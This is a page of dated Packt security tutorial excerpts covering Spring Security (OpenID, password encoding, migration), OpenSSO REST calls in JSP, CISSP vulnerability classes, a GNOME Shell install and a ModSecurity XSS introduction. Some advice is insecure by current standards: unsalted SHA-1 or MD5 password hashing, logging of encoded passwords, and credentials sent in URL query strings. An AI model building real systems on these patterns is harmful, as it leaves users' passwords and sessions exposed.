Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Free Learning
Arrow right icon

How-To Tutorials - Cybersecurity

90 Articles
article-image-opening-openid-spring-security
Packt
27 May 2010
7 min read
Save for later

Opening up to OpenID with Spring Security

Packt
27 May 2010
7 min read
(For more resources on Spring, see here.) The promising world of OpenID The promise of OpenID as a technology is to allow users on the web to centralize their personal data and information with a trusted provider, and then use the trusted provider as a delegate to establish trustworthiness with other sites with whom the user wants to interact. In concept, this type of login through a trusted third party has been in existence for a long time, in many different forms (Microsoft Passport, for example, became one of the more notable central login services on the web for some time). OpenID's distinct advantage is that the OpenID Provider needs to implement only the public OpenID protocol to be compatible with any site seeking to integrate login with OpenID. The OpenID specification itself is an open specification, which leads to the fact that there is currently a diverse population of public providers up and running the same protocol. This is an excellent recipe for healthy competition and it is good for consumer choice. The following diagram illustrates the high-level relationship between a site integrating OpenID during the login process and OpenID providers. We can see that the user presents his credentials in the form of a unique named identifier, typically a Uniform Resource Identifier (URI), which is assigned to the user by their OpenID provider, and is used to uniquely identify both the user and the OpenID provider. This is commonly done by either prepending a subdomain to the URI of the OpenID provider (for example, https://jamesgosling.myopenid.com/), or appending a unique identifier to the URI of the OpenID provider URI (for example, https://me.yahoo.com/jamesgosling). We can visually see from the presented URI that both methods clearly identify both the OpenID provider(via domain name) and the unique user identifier. Don't trust OpenID unequivocally! You can see here a fundamental assumption that can fool users of the system. It is possible for us to sign up for an OpenID, which would make it appear as though we were James Gosling, even though we obviously are not. Do not make the false assumption that just because a user has a convincing-sounding OpenID (or OpenID delegate provider) they are the authentic person, without requiring additional forms of identification. Thinking about it another way, if someone came to your door just claiming he was James Gosling, would you let him in without verifying his ID? The OpenID-enabled application then redirects the user to the OpenID provider, at which the user presents his credentials to the provider, which is then responsible for making an access decision. Once the access decision has been made by the provider, the provider redirects the user to the originating site, which is now assured of the user's authenticity. OpenID is much easier to understand once you have tried it. Let's add OpenID to the JBCP Pets login screen now! Signing up for an OpenID In order to get the full value of exercises in this section (and to be able to test login), you'll need your own OpenID from one of the many available providers, of which a partial listing is available at http://openid.net/get-an-openid/. Common OpenID providers with which you probably already have an account are Yahoo!, AOL, Flickr, or MySpace. Google's OpenID support is slightly different, as we'll see later in this article when we add Sign In with Google support to our login page. To get full value out of the exercises in this article, we recommend you have accounts with at least: myOpenID Google Enabling OpenID authentication with Spring Security Spring Security provides convenient wrappers around provider integrations that are actually developed outside the Spring ecosystem. In this vein, the openid4java project ( http://code.google.com/p/openid4java/) provides the underlying OpenID provider discovery and request/response negotiation for the Spring Security OpenID functionality. Writing an OpenID login form It's typically the case that a site will present both standard (username and password) and OpenID login options on a single login page, allowing the user to select from one or the other option, as we can see in the JBCP Pets target login page. The code for the OpenID-based form is as follows: <h1>Or, Log Into Your Account with OpenID</h1> <p> Please use the form below to log into your account with OpenID. </p> <form action="j_spring_openid_security_check" method="post"> <label for="openid_identifier">Login</label>: <input id="openid_identifier" name="openid_identifier" size="20" maxlength="100" type="text"/> <img src="images/openid.png" alt="OpenID"/> <br /> <input type="submit" value="Login"/> </form> The name of the form field, openid_identifier, is not a coincidence. The OpenID specification recommends that implementing websites use this name for their OpenID login field, so that user agents (browsers) have the semantic knowledge of the function of this field. There are even browser plug-ins such as Verisign's OpenID SeatBelt ( https://pip.verisignlabs.com/seatbelt.do), which take advantage of this knowledge to pre-populate your OpenID credentials into any recognizable OpenID field on a page. You'll note that we don't offer the remember me option with OpenID login. This is due to the fact that the redirection to and from the vendor causes the remember me checkbox value to be lost, such that when the user's successfully authenticated, they no longer have the remember me option indicated. This is unfortunate, but ultimately increases the security of OpenID as a login mechanism for our site, as OpenID forces the user to establish a trust relationship through the provider with each and every login. Configuring OpenID support in Spring Security Turning on basic OpenID support, via the inclusion of a servlet filter and authentication provider, is as simple as adding a directive to our <http> configuration element in dogstore-security.xml as follows:/   <http auto-config="true" ...> <!-- Omitting content... --> <openid-login/> </http> After adding this configuration element and restarting the application, you will be able to use the OpenID login form to present an OpenID and navigate through the OpenID authentication process. When you are returned to JBCP Pets, however, you will be denied access. This is because your credentials won’t have any roles assigned to them. We’ll take care of this next. Adding OpenID users As we do not yet have OpenID-enabled new user registration, we'll need to manually insert the user account (that we'll be testing) into the database, by adding them to test-users-groups-data.sql in our database bootstrap code. We recommend that you use myOpenID for this step (notably, you will have trouble with Yahoo!, for reasons we'll explain in a moment). If we assume that our OpenID is https://jamesgosling.myopenid.com/, then the SQL that we'd insert in this file is as follows: insert into users(username, password, enabled, salt) values ('https:// jamesgosling.myopenid.com/','unused',true,CAST(RAND()*1000000000 AS varchar)); insert into group_members(group_id, username) select id,'https:// jamesgosling.myopenid.com/' from groups where group_ name='Administrators'; You'll note that this is similar to the other data that we inserted for our traditional username-and password-based admin account, with the exception that we have the value unused for the password. We do this, of course, because OpenID-based login doesn't require that our site should store a password on behalf of the user! The observant reader will note, however, that this does not allow a user to create an arbitrary username and password, and associate it with an OpenID—we describe this process briefly later in this article, and you are welcome to explore how to do this as an advanced application of this technology. At this point, you should be able to complete a full login using OpenID. The sequence of redirects is illustrated with arrows in the following screenshot: We've now OpenID-enabled JBCP Pets login! Feel free to test using several OpenID providers. You'll notice that, although the overall functionality is the same, the experience that the provider offers when reviewing and accepting the OpenID request differs greatly from provider to provider.
Read more
  • 0
  • 2
  • 17144

article-image-spring-security-configuring-secure-passwords
Packt
24 May 2010
6 min read
Save for later

Encode your password with Spring Security 3

Packt
24 May 2010
6 min read
This article by Peter Mularien is an excerpt from the book Spring Security 3. In this article, we will: Examine different methods of configuring password encoding Understand the password salting technique of providing additional security to stored passwords (For more resources on Spring, see here.) In any secured system, password security is a critical aspect of trust and authoritativeness of an authenticated principal. Designers of a fully secured system must ensure that passwords are stored in a way in which malicious users would have an impractically difficult time compromising them. The following general rules should be applied to passwords stored in a database: Passwords must not be stored in cleartext (plain text) Passwords supplied by the user must be compared to recorded passwords in the database A user's password should not be supplied to the user upon demand (even if the user forgets it) For the purposes of most applications, the best fit for these requirements involves one-way encoding or encryption of passwords as well as some type of randomization of the encrypted passwords. One-way encoding provides the security and uniqueness properties that are important to properly authenticate users with the added bonus that once encrypted, the password cannot be decrypted. In most secure application designs, it is neither required nor desirable to ever retrieve the user's actual password upon request, as providing the user's password to them without proper additional credentials could present a major security risk. Most applications instead provide the user the ability to reset their password, either by presenting additional credentials (such as their social security number, date of birth, tax ID, or other personal information), or through an email-based system. Storing other types of sensitive information Many of the guidelines listed that apply to passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways, for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards). You may already be thinking ahead and wondering, given our (admittedly unrealistic) approach of using SQL to populate our HSQL database with users, how do we encode the passwords? HSQL, or most other databases for that matter, don't offer encryption methods as built-in database functions. Typically, the bootstrap process (populating a system with initial users and data) is handled through some combination of SQL loads and Java code. Depending on the complexity of your application, this process can get very complicated. For the JBCP Pets application, we'll retain the embedded-database declaration and the corresponding SQL, and then add a small bit of Java to fire after the initial load to encrypt all the passwords in the database. For password encryption to work properly, two actors must use password encryption in synchronization ensuring that the passwords are treated and validated consistently. Password encryption in Spring Security is encapsulated and defined by implementations of the o.s.s.authentication.encoding.PasswordEncoder interface. Simple configuration of a password encoder is possible through the <password-encoder> declaration within the <authentication-provider> element as follows: <authentication-manager alias="authenticationManager"> <authentication-provider user-service-ref="jdbcUserService"> <password-encoder hash="sha"/> </authentication-provider></authentication-manager> You'll be happy to learn that Spring Security ships with a number of implementations of PasswordEncoder, which are applicable for different needs and security requirements. The implementation used can be specified using the hash attribute of the <password-encoder> declaration. The following table provides a list of the out of the box implementation classes and their benefits. Note that all implementations reside in the o.s.s.authentication. encoding package. Implementation class Description hash value PlaintextPasswordEncoder Encodes the password as plaintext. Default DaoAuthenticationProvider password encoder. plaintext Md4PasswordEncoder PasswordEncoder utilizing the MD4 hash algorithm. MD4 is not a secure algorithm-use of this encoder is not recommended. md4 Md5PasswordEncoder PasswordEncoder utilizing the MD5 one-way encoding algorithm. md5 ShaPasswordEncoder PasswordEncoder utilizing the SHA one-way encoding algorithm. This encoder can support confi gurable levels of encoding strength. Sha   sha-256 LdapShaPasswordEncoder Implementation of LDAP SHA and LDAP SSHA algorithms used in integration with LDAP authentication stores. {sha}   {ssha}   As with many other areas of Spring Security, it's also possible to reference a bean definition implementing PasswordEncoder to provide more precise configuration and allow the PasswordEncoder to be wired into other beans through dependency injection. For JBCP Pets, we'll need to use this bean reference method in order to encode the bootstrapped user data. Let's walk through the process of configuring basic password encoding for the JBCP Pets application. Configuring password encoding Configuring basic password encoding involves two pieces—encrypting the passwords we load into the database after the SQL script executes, and ensuring that the DaoAuthenticationProvider is configured to work with a PasswordEncoder. Configuring the PasswordEncoder First, we'll declare an instance of a PasswordEncoder as a normal Spring bean: <bean class="org.springframework.security.authentication. encoding.ShaPasswordEncoder" id="passwordEncoder"/> You'll note that we're using the SHA-1 PasswordEncoder implementation. This is an efficient one-way encryption algorithm, commonly used for password storage. Configuring the AuthenticationProvider We'll need to configure the DaoAuthenticationProvider to have a reference to the PasswordEncoder, so that it can encode and compare the presented password during user login. Simply add a <password-encoder> declaration and refer to the bean ID we defined in the previous step: <authentication-manager alias="authenticationManager"> <authentication-provider user-service-ref="jdbcUserService"> <password-encoder ref="passwordEncoder"/> </authentication-provider></authentication-manager> Try to start the application at this point, and then try to log in. You'll notice that what were previously valid login credentials are now being rejected. This is because the passwords stored in the database (loaded with the bootstrap test-users-groupsdata. sql script) are not stored in an encrypted form that matches the password encoder. We'll need to post-process the bootstrap data with some simple Java code. Writing the database bootstrap password encoder The approach we'll take for encoding the passwords loaded via SQL is to have a Spring bean that executes an init method after the embedded-database bean is instantiated. The code for this bean, com.packtpub.springsecurity.security. DatabasePasswordSecurerBean, is fairly simple. public class DatabasePasswordSecurerBean extends JdbcDaoSupport { @Autowired private PasswordEncoder passwordEncoder; public void secureDatabase() { getJdbcTemplate().query("select username, password from users", new RowCallbackHandler(){ @Override public void processRow(ResultSet rs) throws SQLException { String username = rs.getString(1); String password = rs.getString(2); String encodedPassword = passwordEncoder.encodePassword(password, null); getJdbcTemplate().update("update users set password = ? where username = ?", encodedPassword,username); logger.debug("Updating password for username: "+username+" to: "+encodedPassword); } }); } } The code uses the Spring JdbcTemplate functionality to loop through all the users in the database and encode the password using the injected PasswordEncoder reference. Each password is updated individually.
Read more
  • 0
  • 0
  • 7093

article-image-migration-spring-security-3
Packt
21 May 2010
5 min read
Save for later

Migration to Spring Security 3

Packt
21 May 2010
5 min read
(For more resources on Spring, see here.) During the course of this article we will: Review important enhancements in Spring Security 3 Understand configuration changes required in your existing Spring Security 2 applications when moving them to Spring Security 3 Illustrate the overall movement of important classes and packages in Spring Security 3 Once you have completed the review of this article, you will be in a good position to migrate an existing application from Spring Security 2 to Spring Security 3. Migrating from Spring Security 2 You may be planning to migrate an existing application to Spring Security 3, or trying to add functionality to a Spring Security 2 application and looking for guidance. We'll try to address both of your concerns in this article. First, we'll run through the important differences between Spring Security 2 and 3—both in terms of features and configuration. Second, we'll provide some guidance in mapping configuration or class name changes. These will better enable you to translate the examples from Spring Security 3 back to Spring Security 2 (where applicable). A very important migration note is that Spring Security 3 mandates a migration to Spring Framework 3 and Java 5 (1.5) or greater. Be aware that in many cases, migrating these other components may have a greater impact on your application than the upgrade of Spring Security! Enhancements in Spring Security 3 Significant enhancements in Spring Security 3 over Spring Security 2 include the following: The addition of Spring Expression Language (SpEL) support for access declarations, both in URL patterns and method access specifications. Additional fine-grained configuration around authentication and accessing successes and failures. Enhanced capabilities of method access declaration, including annotationbased pre-and post-invocation access checks and filtering, as well as highly configurable security namespace XML declarations for custom backing bean behavior. Fine-grained management of session access and concurrency control using the security namespace. Noteworthy revisions to the ACL module, with the removal of the legacy ACL code in o.s.s.acl and some important issues with the ACL framework are addressed. Support for OpenID Attribute Exchange, and other general improvements to the robustness of OpenID. New Kerberos and SAML single sign-on support through the Spring Security Extensions project. Other more innocuous changes encompassed a general restructuring and cleaning up of the codebase and the configuration of the framework, such that the overall structure and usage makes much more sense. The authors of Spring Security have made efforts to add extensibility where none previously existed, especially in the areas of login and URL redirection. If you are already working in a Spring Security 2 environment, you may not find compelling reasons to upgrade if you aren't pushing the boundaries of the framework. However, if you have found limitations in the available extension points, code structure, or configurability of Spring Security 2, you'll welcome many of the minor changes that we discuss in detail in the remainder of this article. Changes to configuration in Spring Security 3 Many of the changes in Spring Security 3 will be visible in the security namespace style of configuration. Although this article cannot cover all of the minor changes in detail, we'll try to cover those changes that will be most likely to affect you as you move to Spring Security 3. Rearranged AuthenticationManager configuration The most obvious changes in Spring Security 3 deal with the configuration of the AuthenticationManager and any related AuthenticationProvider elements. In Spring Security 2, the AuthenticationManager and AuthenticationProvider configuration elements were completely disconnected—declaring an AuthenticationProvider didn't require any notion of an AuthenticationManager at all. <authentication-provider> <jdbc-user-service data-source-ref="dataSource" /></authentication-provider> In Spring Security 2 to declare the <authentication-manager> element as a sibling of any AuthenticationProvider. <authentication-manager alias="authManager"/><authentication-provider> <jdbc-user-service data-source-ref="dataSource"/></authentication-provider><ldap-authentication-provider server-ref="ldap://localhost:10389/"/> In Spring Security 3, all AuthenticationProvider elements must be the children of <authentication-manager> element, so this would be rewritten as follows: <authentication-manager alias="authManager"> <authentication-provider> <jdbc-user-service data-source-ref="dataSource" /> </authentication-provider> <ldap-authentication-provider server-ref= "ldap://localhost:10389/"/></authentication-manager> Of course, this means that the <authentication-manager> element is now required in any security namespace configurations. If you had defined a custom AuthenticationProvider in Spring Security 2, you would have decorated it with the <custom-authentication-provider> element as part of its bean definition. <bean id="signedRequestAuthenticationProvider" class="com.packtpub.springsecurity.security .SignedUsernamePasswordAuthenticationProvider"> <security:custom-authentication-provider/> <property name="userDetailsService" ref="userDetailsService"/><!-- ... --></bean> While moving this custom AuthenticationProvider to Spring Security 3, we would remove the decorator element and instead configure the AuthenticationProvider using the ref attribute of the <authentication-provider> element as follows: <authentication-manager alias="authenticationManager"> <authentication-provider ref= "signedRequestAuthenticationProvider"/></authentication-manager> Of course, the source code of our custom provider would change due to class relocations and renaming in Spring Security 3—look later in the article for basic guidelines, and in the code download for this article to see a detailed mapping. New configuration syntax for session management options In addition to continuing support for the session fixation and concurrency control features from prior versions of the framework, Spring Security 3 adds new configuration capabilities for customizing URLs and classes involved in session and concurrency control management. If your older application was configuring session fixation protection or concurrent session control, the configuration settings have a new home in the <session-management> directive of the <http> element. In Spring Security 2, these options would be configured as follows: <http ... session-fixation-protection="none"><!-- ... --> <concurrent-session-control exception-if-maximum-exceeded ="true" max-sessions="1"/></http> The analogous configuration in Spring Security 3 removes the session-fixation-protection attribute from the <http> element, and consolidates as follows: <http ...> <session-management session-fixation-protection="none"> <concurrency-control error-if-maximum-exceeded ="true" max-sessions="1"/> </session-management></http> You can see that the new logical organization of these options is much more sensible and leaves room for future expansion.
Read more
  • 0
  • 0
  • 4929
Banner background image

article-image-securing-our-applications-using-opensso-glassfish-security
Packt
12 May 2010
8 min read
Save for later

Securing our Applications using OpenSSO in GlassFish Security

Packt
12 May 2010
8 min read
An example of such system is integration between an online shopping system, the product provider who actually produces the goods, the insurance company that provides insurance on purchases, and finally the shipping company that delivers the goods to the consumers' hand. All of these systems access some parts of the data, which flows into the other software to perform its job in an efficient way. All the employees can benefit from a single sign-on solution, which keeps them free from having to authenticate themselves multiple times during the working day. Another example can be a travel portal, whose clients need to communicate with many other systems to plan their traveling. Integration between an in-house system and external partners can happen in different levels, from communication protocol and data format to security policies, authentication, and authorization. Because of the variety of communication models, policies, and client types that each partner may use, unifying the security model is almost impossible and the urge for some kind of integration mechanism shows itself bolder and bolder. SSO as a concept and OpenSSO as a product address this urge for integrating the systems' security together. OpenSSO provides developers with several client interfaces to interact with OpenSSO to perform authentication, authorization, session and identity management, and audition. These interfaces include Client SDK for different programming languages and using standards including: Liberty Alliance Project and Security Assertion Markup Language (SAML) for authentication and single sign-on (SSO) XML Access Control Markup Language (XACML) for authorization functions Service Provisioning Markup Language (SPML) for identity management functions. Using the client SDKs and standards mentioned above are suitable when we are developing custom solutions or integrating our system with partners, which are already using them in their security infrastructure. For any other scenario these methods are overkill for developers. To make it easier for the developers to interact with OpenSSO core services the Identity Web Services are provided. We discussed IWS briefly in OpenSSO functionalities section. The IWS are included in OpenSSO to perform the tasks included in the following table. Task Description Authentication and Single sign-on Verifying the user credentials or its authentication token. Authorization Checking the authenticated user's permissions for accessing a resource. Provisioning Creating, deleting, searching, and editing users. Logging Ability to audit and record operations. IWS are exposed in two models—the first model is the WS-* compliant SOAP-based Web Services and the second model is a very simple but elegant RESTful set of services based on HTTP and REST principles. Finally, the third way of using OpenSSO is deploying the policy agents to protect the resources available in a container. In the following section we will use RESTful interface to perform authentication, authorization, and SSO. Authenticating users by the RESTful interface Performing authentication using the RESTful Web Services interface is very simple as it is just like performing a pure HTTP communication with an HTTP server. For each type of operation there is one URL, which may have some required parameters and the output is what we can expect from that operation. The URL for authentication operation along with its parameters is as follows: Operation: Authentication Operation URL: http://host:port/OpenSSOContext/identity/authenticate Parameters: username, password, uri Output: subjectid The Operation URL specifies the address of a Servlet which will receive the required parameters, perform the operation, and write back the result. In the template included above we have the host, port, and OpenSSOContext which are things we already know. After the context we have the path to the RESTful service we want to invoke. The path includes the task type, which can be one of the tasks included in the IWS task lists table and the operation we want to invoke. All parameters are self-descriptive except the uri. We pass a URL to have our users redirected to it after the authentication is performed. This URL can include information related to the user or the original resource which the user has requested. In the case of successful authentication we will receive a subjectid, which we can use in any other RESTful operation like authorization, to log in, log out, and so on. If you remember session ID from your web development experience, subjected is the same as session ID. You can view all sessions along with related information from the OpenSSO administration console homepage under the Sessions tab. The following listing shows a sample JSP page which performs a RESTful call over OpenSSO to authenticate a user and obtain a session ID for the user if they get authenticated. <%try {String operationURL ="http://gfbook.pcname.com:8080/opensso/identity/authenticate";String username = "james";String password = "james";username = java.net.URLEncoder.encode(username, "UTF-8");password = java.net.URLEncoder.encode(password, "UTF-8");String operationString = operationURL + "?username=" +username +"&password=" + password;java.net.URL Operation = new java.net.URL(operationString);java.net.HttpURLConnection connection =(java.net.HttpURLConnection)Operation.openConnection();int responseCode = connection.getResponseCode();if (responseCode == java.net.HttpURLConnection.HTTP_OK) {java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader((java.io.InputStream) connection.getContent()));out.println("<h2>Subject ID</h2>");String line = reader.readLine();out.println(line);}} catch (Exception e) {e.printStackTrace();}%> REST made straightforward tasks easier than ever. Without using REST we would have dealt with complexity of SOAP and WSDL and so on but with REST you can understand the whole code with the first scan. Beginning from the top, we define the REST operation URL, which is assembled using the operation URL and appending the required parameters using the parameters name and the parameters value. The URL that we will connect to it will be something like: http://gfbook.pcname.com:8080/opensso/identity/authenticate?username=james&password=james After assembling the URL we open a network connection to authenticate it. After opening the connection we can check to see whether we received an HTTP_OK response from the server or not. Receiving the HTTP_OK means that the authentication was successful and we can read the subjectid from the socket. The connection may result in other response codes like HTTP_UNAUTHORIZED (HTTP Error code 401) when the credentials are not valid. A complete list of possible return values can be found at http://java.sun.com/javase/6/docs/api/java/net/HttpURLConnection.html. Authorizing using REST If you remember in Configuring OpenSSO for authentication and authorization section we defined a rule that was set to police http://gfbook.pcname.com:8080/ URL for us. And later on we applied the policy rule to a group of users that we created; now we want to check and see how our policy works. In every security system, before any authorization process, an authentication process should compete with a positive result. In our case the result for the authentication is subjectid, which the authorization process will use to check whether the authenticated entity is allowed to perform the action or not. The URL for the authorization operation along with its parameters is as follows: Operation: Authorization Operation URL: http://host:port/OpenSSOContext/identity/authorize Parameters: uri, action, subjectid Output: True or false based on the permission of subject over the entity and given action The combination of uri, action, and subjectid specifies that we want to check our client, identified by subjectid, permission for performing the specified action on the resource identified by the uri. The output of the service invocation is either true or false. The following listing shows how we can check whether an authenticated user has access to a certain resource or not. In the sample code we are checking james, identified by his subjectid we acquired by executing the previous code snippet, against the localhost Protector rule we defined earlier. <%try {String operationURL ="http://gfbook.pcname.com:8080/opensso/identity/authorize";String protectecUrl = " http://127.0.0.1:38080/Conversion-war/";String subjectId ="AQIC5wM2LY4SfcyemVIZX6qBGdyH7b8C5KFJjuuMbw4oj24=@AAJTSQACMDE=#";String action = "POST";protectecUrl = java.net.URLEncoder.encode(protectecUrl, "UTF-8");subjectId = java.net.URLEncoder.encode(subjectId, "UTF-8");String operationString = operationURL + "?uri=" + protectecUrl +"&action=" + action + "&subjectid=" + subjectId;java.net.URL Operation = new java.net.URL(operationString);java.net.HttpURLConnection connection =(java.net.HttpURLConnection) Operation.openConnection();int responseCode = connection.getResponseCode();if (responseCode == java.net.HttpURLConnection.HTTP_OK) {java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader((java.io.InputStream) connection.getContent()));out.println("<h2>authorization Result</h2>");String line = reader.readLine();out.println(line);}} catch (Exception e) {e.printStackTrace();}%> For this listing everything is the same as the authentication process in terms of initializing objects and calling methods, except that in the beginning we define the protected URL string, then we include the subjectid, which is result of our previous authentication. Later on we define the action that we need to check the permission of our authenticated user over it and finally we read the result of authorization. The complete operation after including all parameters is similar to the following snippet: http://gfbook.pcname.com:8080/opensso/identity/authorize?uri=http://127.0.0.1:38080/Conversion-war/&action=POST&subjectid=subjectId Pay attention that two subjectid elements cannot be similar even for the same user on the same machine and same OpenSSO installation. So, before running this code, make sure that you perform the authentication process and include the subjectid resulted from your authentication with the subjectid we specified previously.
Read more
  • 0
  • 0
  • 2927

article-image-cissp-vulnerability-and-penetration-testing-access-control
Packt
12 Mar 2010
6 min read
Save for later

CISSP: Vulnerability and Penetration Testing for Access Control

Packt
12 Mar 2010
6 min read
IT components such as operating systems, application software, and even networks, have many vulnerabilities. These vulnerabilities are open to compromise or exploitation. This creates the possibility for penetration into the systems that may result in unauthorized access and a compromise of confidentiality, integrity, and availability of information assets. Vulnerability tests are performed to identify vulnerabilities while penetration tests are conducted to check the following: The possibility of compromising the systems such that the established access control mechanisms may be defeated and unauthorized access is gained The systems can be shut down or overloaded with malicious data using techniques such as DoS attacks, to the point where access by legitimate users or processes may be denied Vulnerability assessment and penetration testing processes are like IT audits. Therefore, it is preferred that they are performed by third parties. The primary purpose of vulnerability and penetration tests is to identify, evaluate, and mitigate the risks due to vulnerability exploitation. Vulnerability assessment Vulnerability assessment is a process in which the IT systems such as computers and networks, and software such as operating systems and application software are scanned in order to indentify the presence of known and unknown vulnerabilities. Vulnerabilities in IT systems such as software and networks can be considered holes or errors. These vulnerabilities are due to improper software design, insecure coding, or both. For example, buffer overflow is a vulnerability where the boundary limits for an entity such as variables and constants are not properly defined or checked. This can be compromised by supplying data which is greater than what the entity can hold. This results in a memory spill over into other areas and thereby corrupts the instructions or code that need to be processed by the microprocessor. When a vulnerability is exploited it results in a security violation, which will result in a certain impact. A security violation may be an unauthorized access, escalation of privileges, or denial-of-service to the IT systems. Tools are used in the process of identifying vulnerabilities. These tools are called vulnerability scanners. A vulnerability scanning tool can be a hardware-based or software application. Generally, vulnerabilities can be classified based on the type of security error. A type is a root cause of the vulnerability. Vulnerabilities can be classified into the following types: Access Control Vulnerabilities It is an error due to the lack of enforcement pertaining to users or functions that are permitted, or denied, access to an object or a resource. Examples: Improper or no access control list or table No privilege model Inadequate file permissions Improper or weak encoding Security violation and impact: Files, objects, or processes can be accessed directly without authenticationor routing. Authentication Vulnerabilities It is an error due to inadequate identification mechanisms so that a user or a process is not correctly identified. Examples: Weak or static passwords Improper or weak encoding, or weak algorithms Security violation and impact: An unauthorized, or less privileged user (for example, Guest user), or a less privileged process gains higher privileges, such as administrative or root access to the system Boundary Condition Vulnerabilities It is an error due to inadequate checking and validating mechanisms such that the length of the data is not checked or validated against the size of the data storage or resource. Examples: Buffer overflow Overwriting the original data in the memory Security violation and impact: Memory is overwritten with some arbitrary code so that is gains access to programs or corrupts the memory. This will ultimately crash the operating system. An unstable system due to memory corruption may be exploited to get command prompt, or shell access, by injecting an arbitrary code Configuration Weakness Vulnerabilities It is an error due to the improper configuration of system parameters, or leaving the default configuration settings as it is, which may not be secure. Examples: Default security policy configuration File and print access in Internet connection sharing Security violation and impact: Most of the default configuration settings of many software applications are published and are available in the public domain. For example, some applications come with standard default passwords. If they are not secured, they allow an attacker to compromise the system. Configuration weaknesses are also exploited to gain higher privileges resulting in privilege escalation impacts. Exception Handling Vulnerabilities It is an error due to improper setup or coding where the system fails to handle, or properly respond to, exceptional or unexpected data or conditions. Example: SQL Injection Security violation and impact: By injecting exceptional data, user credentials can be captured by an unauthorized entity Input Validation Vulnerabilities It is an error due to a lack of verification mechanisms to validate the input data or contents. Examples: Directory traversal Malformed URLs Security violation and impact: Due to poor input validation, access to system-privileged programs may be obtained. Randomization Vulnerabilities It is an error due to a mismatch in random data or random data for the process. Specifically, these vulnerabilities are predominantly related to encryption algorithms. Examples: Weak encryption key Insufficient random data Security violation and impact: Cryptographic key can be compromised which will impact the data and access security. Resource Vulnerabilities It is an error due to a lack of resources availability for correct operations or processes. Examples: Memory getting full CPU is completely utilized Security violation and impact: Due to the lack of resources the system becomes unstable or hangs. This results in a denial of services to the legitimate users. State Error It is an error that is a result of the lack of state maintenance due to incorrect process flows. Examples: Opening multiple tabs in web browsers Security violation and impact: There are specific security attacks, such as Cross-site scripting (XSS), that will result in user-authenticated sessions being hijacked. Information security professionals need to be aware of the processes involved in identifying system vulnerabilities. It is important to devise suitable countermeasures, in a cost effective and efficient way, to reduce the risk factor associated with the identified vulnerabilities. Some such measures are applying patches supplied by the application vendors and hardening the systems.
Read more
  • 0
  • 0
  • 4346

article-image-install-gnome-shell-ubuntu-910-karmic-koala
Packt
18 Jan 2010
3 min read
Save for later

Install GNOME-Shell on Ubuntu 9.10 "Karmic Koala"

Packt
18 Jan 2010
3 min read
Remember, these are development builds and preview snapshots, and are still in the early stages. While it appears to be functional (so far) your mileage may vary. Installing GNOME-Shell With the release of Ubuntu 9.10, a GNOME-Shell preview is included in the repositories. This makes it very easy to install (and remove) as needed. The downside is that it is just a snapshot so you are not running the latest-greatest builds. For this reason I've included instructions on installing the package as well as compiling the latest builds. I should also note that GNOME Shell requires reasonable 3D support. This means that it will likely *not* work within a virtual machine. In particular, problems have been reported trying to run GNOME Shell with 3D support in VirtualBox. Package Installation If you'd prefer to install the package and just take a sneak-peek at the snapshot, simply run the command below in your terminal: sudo aptitude install gnome-shell Manual Compilation Manually compiling GNOME Shell will allow you to use the latest and greatest builds, but it can also require more work. The notes below are based on a successful build I did in late 2009, but your mileage may vary. If you run into problems please note the following: Installing GNOME Shell does not affect your current installation, so if the build breaks you should still have a clean environment. You can find more details as well as known issues here: GnomeShell There is one package that you'll need to compile GNOME Shell called jhbuild. This package, however, has been removed from the Ubuntu 9.10 repositories for being outdated. I did find that I could use the package from the 9.04 repository and haven’t noticed any problems in doing so. To install jhbuild from the 9.04 repository use the instructions below: Visit http://packages.ubuntu.com/jaunty/all/jhbuild/download Select a mirror close to you Download / Install the .deb package. I don’t believe there are any additional dependencies needed for this package. After that package is installed you’ll want to download a GNOME Shell Build Setup script which makes this entire process much, much simpler. cd ~ wget http://git.gnome.org/cgit/gnome-shell/plain/tools/build/gnome-shell-build-setup.sh This script will handle finding and installing dependencies as well as compiling the builds, etc. To launch this script, run the command: gnome-shell-build-setup.sh You'll need to ensure that any suggested packages are installed before continuing. You may need to re-run this script multiple times until it has no more warnings. Lastly, you can begin the build process. This process took about twenty minutes on my C2D 2.0Ghz Dell laptop. My build was completely automated, but considering this is building newer and newer builds, your mileage may vary. To begin the build process on your machine, run the command: jhbuild build Ready To Launch Congratulations! You've now got GNOME-Shell installed and ready to launch. I've outlined the steps below. Please take note of the method, depending on how you installed. Also, please note that before you launch GNOME-Shell you must DISABLE Compiz. If you have Compiz running, navigate to System > Preferences > Appearances and disable it under the Desktop Effects tab. Package Installation Launch gnome-shell --replace Manual Compilation It will as follows: ~/gnome-shell/source/gnome-shell/src/gnome-shell --replace
Read more
  • 0
  • 0
  • 3764
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-blocking-common-attacks-using-modsecurity-25-part-2
Packt
01 Dec 2009
11 min read
Save for later

Blocking Common Attacks using ModSecurity 2.5: Part 2

Packt
01 Dec 2009
11 min read
Cross-site scripting Cross-site scripting attacks occur when user input is not properly sanitized and ends up in pages sent back to users. This makes it possible for an attacker to include malicious scripts in a page by providing them as input to the page. The scripts will be no different than scripts included in pages by the website creators, and will thus have all the privileges of an ordinary script within the page—such as the ability to read cookie data and session IDs. In this article we will look in more detail on how to prevent attacks. The name "cross-site scripting" is actually rather poorly chosen—the name stems from the first such vulnerability that was discovered, which involved a malicious website using HTML framesets to load an external site inside a frame. The malicious site could then manipulate the loaded external site in various ways—for example, read form data, modify the site, and basically perform any scripting action that a script within the site itself could perform. Thus cross-site scripting, or XSS, was the name given to this kind of attack. The attacks described as XSS attacks have since shifted from malicious frame injection (a problem that was quickly patched by web browser developers) to the class of attacks that we see today involving unsanitized user input. The actual vulnerability referred to today might be better described as a "malicious script injection attack", though that doesn't give it quite as flashy an acronym as XSS. (And in case you're curious why the acronym is XSS and not CSS, the simple explanation is that although CSS was used as short for cross-site scripting in the beginning, it was changed to XSS because so many people were confusing it with the acronym used for Cascading Style Sheets, which is also 